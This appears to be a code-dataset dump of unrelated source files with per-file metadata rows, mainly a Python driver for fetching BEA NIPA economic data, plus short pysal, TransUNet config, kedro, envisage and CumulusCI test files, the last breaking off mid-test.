query['params'].update(payload)
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
else:
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"Parameter of Dataset",
"method" :"GetParameterList", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getNIPAVintageTables():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
driver of list of NIPA vintage tables
'''
#TODO: need to put a default url location
#self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
#self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def NIPAVintageTables(self,verbose=False):
'''
Get a list of NIPA Vintage tables (non-API)
Sample run -
NIPAVintageTables()
Args:
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code (empty code for now)
'''
# TODO:
listTables = vintageFns.urlNIPAHistQYVintage( )
output = self._cleanOutput(listTables) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['request'] = listTables
output['code'] = self._getCode() #TODO: write code as method in class
self._lastLoad = output
return(output)
def _cleanOutput(self,listTables):
#TODO: break year/quarter in first column into year and quarter columns
df_output = listTables
df_output['year'] = df_output['yearQuarter'].apply(lambda x: x.split(',')[0].strip())
df_output['quarter'] = df_output['yearQuarter'].apply(lambda x: x.split(',')[1].strip())
df_output.drop('yearQuarter',axis=1,inplace=True)
df_output['releaseDate'] = pd.to_datetime(df_output['releaseDate'],errors='ignore')
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _getCode(self):
code = "to be written"
return(code)
def _driverMetadata(self):
self.metadata = [{
"displayName":"NIPAVintageTables",
"method" :"getNIPAVintageTables", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getNIPAVintage():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
driver of list of NIPA vintage tables
'''
#TODO: need to put a default url location
#self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
#self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
self._urlsOfQYRelease = pd.DataFrame() #a table of the url of data with same QY release. Will load via _getUrlsOfQYRelease if empty
self._urlsOfQueryQYRelease = pd.DataFrame() #table of urls of data with same QY release restricted to query of interest. Load via _queryUrlsOfQYRelease
self._urlsOfExcelTables = pd.DataFrame() #location of Excel tables of interest: type, Title, QY and ReleaseDate. Load with _getUrlsOfData
def NIPAVintage(self,tableName='',frequency='',type = 'main', Title = '',year='',quarter='',vintage = '',releaseDate='',reload=False,verbose=False,beaAPIFormat=False):
'''
Get a list of NIPA Vintage tables (non-API)
Sample run -
Args:
tableName (str): the name of a NIPA table of interest; will return all tables otherwise. Default to '', all tables.
frequency (str): A,Q or M. Returns all frequencies otherwise. Default to '', all frequencies
type (str): main, underlyning, MilsOfDollars. Defaults to main.
Title (str): Section 0, Section 1, etc.
vintage (str): Third, Second, Advance
year (str): string or numeric
quarter (str): Q1,...,Q4
releaseDate (str): will pick the first release date prior or equal to this. string or datetime eg datetime.now(), '2019-04-05', '04-05-2019', 'Apr-05-2019'
reload (bool): reloads getting the datatable by QY ReleaseDate
verbose (bool): False just returns a table with all data. Else, returns cleaned data, code, and returned query
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
self._getUrlsOfData( type, Title,year,quarter,vintage,releaseDate,reload) #get the url of excel sheets with data given type, Title etc
self.array_output = vintageFns.getNIPADataFromListofLinks(self._urlsOfExcelTables)
self.clean_array = self._cleanExcelQuery(self.array_output,tableName,frequency,beaAPIFormat)
output = dict()
output['dataFrame'] = [ x['Results']['Data'] for x in self.clean_array ]
if not verbose:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = 'none' #TODO: fix code
output['request'] = self.clean_array
self._lastLoad = output
return(output)
def _getUrlsOfQYRelease(self,reload=False):
if reload:
self._urlsOfQYRelease = getNIPAVintageTables().NIPAVintageTables()
elif self._urlsOfQYRelease.empty:
self._urlsOfQYRelease = getNIPAVintageTables().NIPAVintageTables()
def _queryUrlsOfQYRelease(self,year='',quarter='',vintage = '',releaseDate='',reload=False):
self._getUrlsOfQYRelease(reload)
df_output = self._urlsOfQYRelease.copy()
if not year == '':
year = str(year)
df_output = df_output.loc[df_output['year']==year]
if not quarter == '':
quarter = quarter.upper()
df_output = df_output.loc[df_output['quarter']==quarter]
if not vintage =='':
vintage = vintage.capitalize()
df_output = df_output.loc[df_output['vintage']==vintage]
if not releaseDate == '':
firstDate = df_output.loc[ df_output['releaseDate'] <= releaseDate]['releaseDate'].max()
df_output = df_output.loc[df_output['releaseDate'] == firstDate]
self._urlsOfQueryQYRelease = df_output
def _getURLsInQYRelease(self,tableLine):
self._urlsInQYRelease = vintageFns.urlNIPAHistQYVintageMainOrUnderlSection( tableLine )
df_output = pd.DataFrame()
for key,table in self._urlsInQYRelease.items():
table.insert(0,'type',key)
df_output = pd.concat([df_output, table ])
return(df_output)
def _getUrlsOfData(self,type = 'main', Title = '',year='',quarter='',vintage = '',releaseDate='',reload=False):
df_output = pd.DataFrame()
#get data the url inside the group with same QY and Release date,
# restrict by the given conditions
self._queryUrlsOfQYRelease(year,quarter,vintage,releaseDate,reload)
#Get the URLs inside each entry above, these are pointers to Excel files
for line in self._urlsOfQueryQYRelease.iterrows():
df_output = pd.concat([df_output, self._getURLsInQYRelease( line[1] ) ])
if not type == '':
type = type.lower()
df_output = df_output.loc[df_output['type']==type]
if not Title == '':
Title = Title.capitalize()
df_output = df_output.loc[df_output['Title']==Title]
self._urlsOfExcelTables = df_output
def _cleanOutput(self,listTables):
#TODO: break year/quarter in first column into year and quarter columns
df_output = listTables
df_output['year'] = df_output['yearQuarter'].apply(lambda x: x.split(',')[0].strip())
df_output['quarter'] = df_output['yearQuarter'].apply(lambda x: x.split(',')[1].strip())
df_output.drop('yearQuarter',axis=1,inplace=True)
df_output['releaseDate'] = pd.to_datetime(df_output['releaseDate'],errors='ignore')
output = {'dataFrame':df_output}
return(output)
def _cleanExcelQuery(self,arrayData,tableName='',frequency='',beaAPIFormat=False):
'''
Given an array of dictionaries (array entry contains all data by year, quarter type Title)
'''
clean_array = []
for entry in arrayData:
baseInfo = {key:val for key, val in entry.items() if not key == 'data'} #data that is not sheet
#restrict to cases containing tableName and frequency
if tableName == '' and frequency == '':
subset = entry['data']
else:
subset = {key:val for key, val in entry['data'].items() if tableName.lower() in key.lower() and frequency.lower() in key.lower() }
subset = vintageFns.formatBeaRaw( subset )
for sheetName, sheet in subset.items():
sName = sheetName.split('_')
table = sName[0]
try:
frequency = sName[1] #covers the case sheetName = 'Contents'
except:
frequency = ''
#add basic info to the pandas table:
sheet['Data'].insert(0,'tableName',table)
sheet['Data'].insert(1,'yearQuarterVintage','-'.join([entry['year'] , entry['quarter'],entry['vintage']]))
sheet['Data'].insert(2,'releaseDate',entry['releaseDate'].strftime("%Y-%m-%d"))
clean_array.append( {**baseInfo, **{'sheetName':sheetName,'tableID':table,'frequency':frequency}, **{'Results':sheet}} )
return(clean_array)
def clipcode(self):
_clipcode(self)
def _getCode(self):
code = "to be written"
return(code)
def _driverMetadata(self):
self.metadata = [{
"displayName":"NIPAVintageTables",
"method" :"getNIPAVintageTables", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getNIPASummary():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
driver of list of NIPA Account Summary tables
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
self.cfgSummary = CFGnipaSummary.tabparams
self.queryNIPA = getNIPA(baseRequest,connectionParameters,userSettings)
self.queryNIPAVintage = getNIPAVintage()
def NIPASummary(self,year,frequency,verbose=False):
'''
Overall view of NIPA data (non-API)
Sample run -
NIPASummary(2018,'Q')
Args:
frequency (str): A,Q or M. Returns all frequencies otherwise. Default to '', all frequencies
year (str): string or numeric
verbose (bool): False just returns a table with all data. Else, returns cleaned data, code, and returned query
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
output = dict()
output['request'] = self._getAccountTable(year,frequency)
output['dataFrame'] = self._cleanRequest(output['request']) #will put Account # - source/use as column title to shorten the request output
if verbose == False:
return(output['dataFrame'])
else:
return(output)
def _cleanRequest(self,requestResult):
df_array = []
for key,entry in requestResult.items():
useTable = entry['uses'].copy()
sourceTable = entry['source'].copy()
useCol = list(useTable.columns)
sourceCol = list(sourceTable.columns)
useCol[0] = key + ' uses'
sourceCol[0] = key + ' sources'
useTable.columns = useCol
sourceTable.columns = sourceCol
df_array.append(useTable)
df_array.append(sourceTable)
return(df_array)
def _getAccountTable(self,year,frequency):
array_output = deepcopy(self.cfgSummary) #use the structure of cfgSummary to output
for acct in self.cfgSummary:
query = self.cfgSummary[acct]['source'] #TODO: query->queryUses querySources - one try - do source and uses at same time.
if acct == 'Account 2':
frequency = 'A' #Account 2 only have annual data
query.update({'frequency':frequency,'year':year})
try:
array_output[acct]['source'] = self._getAccountUseOrSource(**query)
except:
print( 'Could not find information of ' + acct +' on current NIPA. Trying to query historical annual data.' )
array_output[acct]['source'] = self._getAccountUseOrSourceVintage(**query)
query = self.cfgSummary[acct]['uses']
query.update({'frequency':frequency,'year':year})
try:
array_output[acct]['uses'] = self._getAccountUseOrSource(**query)
except:
print( 'Could not find information of ' + acct +' on current NIPA. Trying to query historical annual data.' )
array_output[acct]['source'] = self._getAccountUseOrSourceVintage(**query)
return(array_output)
def _getAccountUseOrSource(self,tableName,year,frequency,tableEntries):
readTable = self.queryNIPA.NIPA(tableName = tableName, frequency = frequency, year = year )
readTable.reset_index(inplace=True)
restrict = pd.DataFrame(tableEntries)
output = pd.merge(restrict,readTable,on=['SeriesCode','SeriesCode'])
output['LineDescription'] = output.apply(lambda x: x['indentation']*'-' + x['LineDescription'],axis=1)
output.drop(['indentation','LineNumber'],axis=1,inplace=True)
output.set_index(['LineDescription','SeriesCode'],inplace=True) #NOTE: this is just for sorting column order
output.reset_index(inplace=True)
return(output)
def _getAccountUseOrSourceVintage(self,tableName,year,frequency,tableEntries,Title ='Section 1',releaseDate=datetime.now()):
'''
Try to get vintage data (try annual). Default is to check the last available vintage datset from current date.
'''
readTable = self.queryNIPAVintage.NIPAVintage(tableName = tableName, frequency = frequency, Title = Title, releaseDate = releaseDate )
readTable = readTable[0]
year = str(min(year,int(readTable.columns[-1]))) #either use: the queried year or the last available year in dateset. The smallest of these.
cols = [ 'Line', 'LineDescription', 'SeriesCode',year ]
readTable = readTable[cols]
#readTable.reset_index(inplace=True)
restrict = pd.DataFrame(tableEntries)
output = pd.merge(restrict,readTable,on=['SeriesCode','SeriesCode'])
output['LineDescription'] = output.apply(lambda x: x['indentation']*'-' + x['LineDescription'],axis=1)
output.drop(['indentation','Line'],axis=1,inplace=True)
output.set_index(['LineDescription','SeriesCode'],inplace=True) #NOTE: this is just for sorting column order
output.reset_index(inplace=True)
return(output)
if __name__ == '__main__':
#from datapungibea.drivers import getNIPA
#v = getNIPA()
#v.NIPA('T10101')
#from datapungibea.drivers import getNIPA #getDatasetlist
#v = getNIPA() #getDatasetlist()
#print(v.NIPA('T10101',verbose=True))
##print(v._lastLoad['code'])
#from datapungibea.drivers import getGetParameterList #getDatasetlist
#v = getGetParameterList()
#print(v.getParameterList('NIPA',verbose = True)['code'])
#
#from datapungibea.drivers import getGetParameterValues #getDatasetlist
#v = getGetParameterValues()
#print(v.getParameterValues('NIPA','TableID'))
#from datapungibea.drivers import getNIPAVintageTables
#v = getNIPAVintageTables()
#print(v.NIPAVintageTables())
#listTables = vintageFns.urlNIPAHistQYVintage( )
#print(listTables)
#from datapungibea.drivers import *
#v = getNIPAVintage()
##print(v._queryUrlsOfQYRelease(releaseDate='2019-04-01'))
##print(v._getUrlsOfData(releaseDate='2019-04-01'))
#cases = v.NIPAVintage(tableName='T10101',frequency='Q',releaseDate = '2018-03-20')
#print(cases)
#v = getNIPASummary()
#print(v.NIPASummary(2018,'Q'))
#table indentations
print(utils.getUserSettings())
print(utils.getPkgConfig())
v = getNIPA()
#print(v.NIPA('T11000',includeIndentations=False))
w= v.NIPA('T11000',verbose=True)
print(w['code'])
#print(w)
| 47.430055
| 205
| 0.601728
| 7,620
| 77,643
| 6.043438
| 0.07231
| 0.035265
| 0.034397
| 0.042192
| 0.740114
| 0.721895
| 0.702895
| 0.693123
| 0.682634
| 0.670756
| 0
| 0.003594
| 0.279768
| 77,643
| 1,636
| 206
| 47.459046
| 0.819907
| 0.272993
| 0
| 0.709647
| 0
| 0.006686
| 0.184426
| 0.045202
| 0
| 0
| 0
| 0.011614
| 0
| 1
| 0.092646
| false
| 0.020057
| 0.021012
| 0
| 0.13085
| 0.008596
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
13bd1bd0610170542ef6317cf8dbdf7d11de55e7
| 98
|
py
|
Python
|
pysal/__init__.py
|
anujaagarwal/pysal
|
8a6681744d73e3307f0b76013d906523f412a94e
|
[
"BSD-3-Clause"
] | null | null | null |
pysal/__init__.py
|
anujaagarwal/pysal
|
8a6681744d73e3307f0b76013d906523f412a94e
|
[
"BSD-3-Clause"
] | null | null | null |
pysal/__init__.py
|
anujaagarwal/pysal
|
8a6681744d73e3307f0b76013d906523f412a94e
|
[
"BSD-3-Clause"
] | 1
|
2016-11-11T19:20:51.000Z
|
2016-11-11T19:20:51.000Z
|
__version__='2.0.0'
from . import lib
from . import explore
from . import viz
from . import model
| 16.333333
| 21
| 0.734694
| 16
| 98
| 4.25
| 0.5625
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037037
| 0.173469
| 98
| 5
| 22
| 19.6
| 0.802469
| 0
| 0
| 0
| 0
| 0
| 0.05102
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
13e99c7ca34f971978415881bdaaa2b086402a5b
| 184
|
py
|
Python
|
.Python Challenges - 101Computing/Random Library Challenges/dice.py
|
Gustavo-daCosta/Projetos
|
459cbf6fc0b67532c1bf2043ccdb915d16ba0df2
|
[
"MIT"
] | 2
|
2021-09-13T22:04:30.000Z
|
2022-01-05T14:01:43.000Z
|
.Python Challenges - 101Computing/Random Library Challenges/dice.py
|
Gustavo-daCosta/Projetos
|
459cbf6fc0b67532c1bf2043ccdb915d16ba0df2
|
[
"MIT"
] | null | null | null |
.Python Challenges - 101Computing/Random Library Challenges/dice.py
|
Gustavo-daCosta/Projetos
|
459cbf6fc0b67532c1bf2043ccdb915d16ba0df2
|
[
"MIT"
] | null | null | null |
# Your task is to write a Python script to throw a dice by randomly generating a value between 1 and 6.
from random import randint
print(f'Number of dice generated: {randint(1, 6)}')
| 36.8
| 103
| 0.755435
| 34
| 184
| 4.088235
| 0.794118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02649
| 0.179348
| 184
| 5
| 104
| 36.8
| 0.89404
| 0.548913
| 0
| 0
| 1
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 5
|
b95d3ed200e7c6563acdd199dc38b4e0f81f7f5b
| 57
|
py
|
Python
|
kedro_mlflow/io/metrics/__init__.py
|
felipeeeantunes/kedro-mlflow
|
6d7023d7b859e4645053db39b2296a7d1ab67073
|
[
"Apache-2.0"
] | null | null | null |
kedro_mlflow/io/metrics/__init__.py
|
felipeeeantunes/kedro-mlflow
|
6d7023d7b859e4645053db39b2296a7d1ab67073
|
[
"Apache-2.0"
] | null | null | null |
kedro_mlflow/io/metrics/__init__.py
|
felipeeeantunes/kedro-mlflow
|
6d7023d7b859e4645053db39b2296a7d1ab67073
|
[
"Apache-2.0"
] | null | null | null |
from .mlflow_metrics_dataset import MlflowMetricsDataSet
| 28.5
| 56
| 0.912281
| 6
| 57
| 8.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 57
| 1
| 57
| 57
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
b9d8366357ddd467e6499ac0d0ef1405c3d86917
| 112
|
py
|
Python
|
enthought/envisage/ui/workbench/workbench_application.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 3
|
2016-12-09T06:05:18.000Z
|
2018-03-01T13:00:29.000Z
|
enthought/envisage/ui/workbench/workbench_application.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 1
|
2020-12-02T00:51:32.000Z
|
2020-12-02T08:48:55.000Z
|
enthought/envisage/ui/workbench/workbench_application.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | null | null | null |
# proxy module
from __future__ import absolute_import
from envisage.ui.workbench.workbench_application import *
| 28
| 57
| 0.857143
| 14
| 112
| 6.428571
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098214
| 112
| 3
| 58
| 37.333333
| 0.891089
| 0.107143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
6a2230e56d804f8c917736dfbb8b1dafcabef3ef
| 4,279
|
py
|
Python
|
networks/vit_seg_configs.py
|
atch841/TransUNet
|
fa952b2f39e5dbc189fd3e0e6481bd1c74eb4c2c
|
[
"Apache-2.0"
] | null | null | null |
networks/vit_seg_configs.py
|
atch841/TransUNet
|
fa952b2f39e5dbc189fd3e0e6481bd1c74eb4c2c
|
[
"Apache-2.0"
] | null | null | null |
networks/vit_seg_configs.py
|
atch841/TransUNet
|
fa952b2f39e5dbc189fd3e0e6481bd1c74eb4c2c
|
[
"Apache-2.0"
] | null | null | null |
import ml_collections
def get_b16_config():
"""Returns the ViT-B/16 configuration."""
config = ml_collections.ConfigDict()
config.patches = ml_collections.ConfigDict({'size': (16, 16)})
config.hidden_size = 768
config.transformer = ml_collections.ConfigDict()
config.transformer.mlp_dim = 3072
config.transformer.num_heads = 12
config.transformer.num_layers = 12
config.transformer.attention_dropout_rate = 0.0
config.transformer.dropout_rate = 0.1
config.classifier = 'seg'
config.representation_size = None
config.resnet_pretrained_path = None
config.pretrained_path = '../model/vit_checkpoint/imagenet21k/ViT-B_16.npz'
config.patch_size = 16
config.decoder_channels = (256, 128, 64, 16)
config.n_classes = 2
config.activation = 'softmax'
return config
def get_testing():
"""Returns a minimal configuration for testing."""
config = ml_collections.ConfigDict()
config.patches = ml_collections.ConfigDict({'size': (16, 16)})
config.hidden_size = 1
config.transformer = ml_collections.ConfigDict()
config.transformer.mlp_dim = 1
config.transformer.num_heads = 1
config.transformer.num_layers = 1
config.transformer.attention_dropout_rate = 0.0
config.transformer.dropout_rate = 0.1
config.classifier = 'token'
config.representation_size = None
return config
def get_r50_b16_config():
"""Returns the Resnet50 + ViT-B/16 configuration."""
config = get_b16_config()
config.patches.grid = (16, 16)
config.resnet = ml_collections.ConfigDict()
config.resnet.num_layers = (3, 4, 9)
config.resnet.width_factor = 1
config.classifier = 'seg'
config.pretrained_path = '/home/viplab/data/R50+ViT-B_16.npz'
config.decoder_channels = (256, 128, 64, 16)
config.skip_channels = [512, 256, 64, 16]
config.n_classes = 2
config.n_skip = 3
config.activation = 'softmax'
return config
def get_b32_config():
"""Returns the ViT-B/32 configuration."""
config = get_b16_config()
config.patches.size = (32, 32)
config.pretrained_path = '../model/vit_checkpoint/imagenet21k/ViT-B_32.npz'
return config
def get_l16_config():
"""Returns the ViT-L/16 configuration."""
config = ml_collections.ConfigDict()
config.patches = ml_collections.ConfigDict({'size': (16, 16)})
config.hidden_size = 1024
config.transformer = ml_collections.ConfigDict()
config.transformer.mlp_dim = 4096
config.transformer.num_heads = 16
config.transformer.num_layers = 24
config.transformer.attention_dropout_rate = 0.0
config.transformer.dropout_rate = 0.1
config.representation_size = None
# custom
config.classifier = 'seg'
config.resnet_pretrained_path = None
config.pretrained_path = '../model/vit_checkpoint/imagenet21k/ViT-L_16.npz'
config.decoder_channels = (256, 128, 64, 16)
config.n_classes = 2
config.activation = 'softmax'
return config
def get_r50_l16_config():
"""Returns the Resnet50 + ViT-L/16 configuration. customized """
config = get_l16_config()
config.patches.grid = (16, 16)
config.resnet = ml_collections.ConfigDict()
config.resnet.num_layers = (3, 4, 9)
config.resnet.width_factor = 1
config.classifier = 'seg'
config.resnet_pretrained_path = '../model/vit_checkpoint/imagenet21k/R50+ViT-B_16.npz'
config.decoder_channels = (256, 128, 64, 16)
config.skip_channels = [512, 256, 64, 16]
config.n_classes = 2
config.activation = 'softmax'
return config
def get_l32_config():
"""Returns the ViT-L/32 configuration."""
config = get_l16_config()
config.patches.size = (32, 32)
return config
def get_h14_config():
"""Returns the ViT-L/16 configuration."""
config = ml_collections.ConfigDict()
config.patches = ml_collections.ConfigDict({'size': (14, 14)})
config.hidden_size = 1280
config.transformer = ml_collections.ConfigDict()
config.transformer.mlp_dim = 5120
config.transformer.num_heads = 16
config.transformer.num_layers = 32
config.transformer.attention_dropout_rate = 0.0
config.transformer.dropout_rate = 0.1
config.classifier = 'token'
config.representation_size = None
return config
| 32.664122
| 90
| 0.702501
| 549
| 4,279
| 5.28051
| 0.156648
| 0.140738
| 0.111073
| 0.100034
| 0.852363
| 0.800966
| 0.770611
| 0.719214
| 0.719214
| 0.577096
| 0
| 0.065161
| 0.182286
| 4,279
| 130
| 91
| 32.915385
| 0.763361
| 0.07899
| 0
| 0.69
| 0
| 0
| 0.075897
| 0.058974
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.01
| 0
| 0.17
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
6a32529bc6243ff17b2615eddfe2d7b05bbcd621
| 96
|
py
|
Python
|
src/choice/__init__.py
|
xlurio/RockPaperScissorsPy
|
927bbd1480dbca70c9bc3b982f4034ac2ff33c57
|
[
"MIT"
] | null | null | null |
src/choice/__init__.py
|
xlurio/RockPaperScissorsPy
|
927bbd1480dbca70c9bc3b982f4034ac2ff33c57
|
[
"MIT"
] | null | null | null |
src/choice/__init__.py
|
xlurio/RockPaperScissorsPy
|
927bbd1480dbca70c9bc3b982f4034ac2ff33c57
|
[
"MIT"
] | null | null | null |
from .choice import Choice
from .player_vs_com_choices_factory import PlayerVsComChoicesFactory
| 32
| 68
| 0.895833
| 12
| 96
| 6.833333
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 96
| 2
| 69
| 48
| 0.931818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
6a38dc33e34f64a0cac342aa122642d15c5d3b79
| 63
|
py
|
Python
|
commons/message.py
|
Aigeruth/bazel-playground
|
4a62d91deb74bbd19e47cae9cdf7faec404be590
|
[
"MIT"
] | null | null | null |
commons/message.py
|
Aigeruth/bazel-playground
|
4a62d91deb74bbd19e47cae9cdf7faec404be590
|
[
"MIT"
] | null | null | null |
commons/message.py
|
Aigeruth/bazel-playground
|
4a62d91deb74bbd19e47cae9cdf7faec404be590
|
[
"MIT"
] | null | null | null |
def print_message(msg):
print("Message: {:s}".format(msg))
| 21
| 38
| 0.650794
| 9
| 63
| 4.444444
| 0.666667
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 63
| 2
| 39
| 31.5
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0.206349
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
6a457894946bc0c57c95dfb510c0fdd30879a585
| 40,303
|
py
|
Python
|
cumulusci/cli/tests/test_org.py
|
sfdcale/CumulusCI
|
96ba7350653c8ed4cd0cb7949d85b77e2acb25fe
|
[
"BSD-3-Clause"
] | null | null | null |
cumulusci/cli/tests/test_org.py
|
sfdcale/CumulusCI
|
96ba7350653c8ed4cd0cb7949d85b77e2acb25fe
|
[
"BSD-3-Clause"
] | null | null | null |
cumulusci/cli/tests/test_org.py
|
sfdcale/CumulusCI
|
96ba7350653c8ed4cd0cb7949d85b77e2acb25fe
|
[
"BSD-3-Clause"
] | null | null | null |
import click
import io
import json
import pytest
import responses
from datetime import date
from datetime import datetime
from datetime import timedelta
from pathlib import Path
from unittest import mock
from contextlib import contextmanager
from cumulusci.cli import cci
from cumulusci.core.config import OrgConfig
from cumulusci.core.config import ScratchOrgConfig
from cumulusci.core.exceptions import OrgNotFound
from cumulusci.core.exceptions import ServiceNotConfigured
from cumulusci.core.exceptions import ScratchOrgException
from .. import org
from .utils import run_click_command
class TestOrgCommands:
@mock.patch("webbrowser.open")
def test_org_browser(self, browser_open):
org_config = mock.Mock()
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
run_click_command(
org.org_browser, runtime=runtime, org_name="test", path=None, url_only=False
)
org_config.refresh_oauth_token.assert_called_once()
browser_open.assert_called_once()
org_config.save.assert_called_once_with()
@mock.patch("webbrowser.open")
def test_org_browser_path(self, browser_open):
start_url = "https://random-word-1234-dev-ed.cs42.my.salesforce.com//secur/frontdoor.jsp?sid=00Dorgid!longtoken"
target_path = "/lightning/setup/Package/home"
org_config = mock.Mock()
org_config.start_url = start_url
runtime = mock.Mock()
runtime.get_org.return_value = ("test", org_config)
run_click_command(
org.org_browser,
runtime=runtime,
org_name="test",
path=target_path,
url_only=False,
)
org_config.refresh_oauth_token.assert_called_once()
expected_query = "&retURL=%2Flightning%2Fsetup%2FPackage%2Fhome"
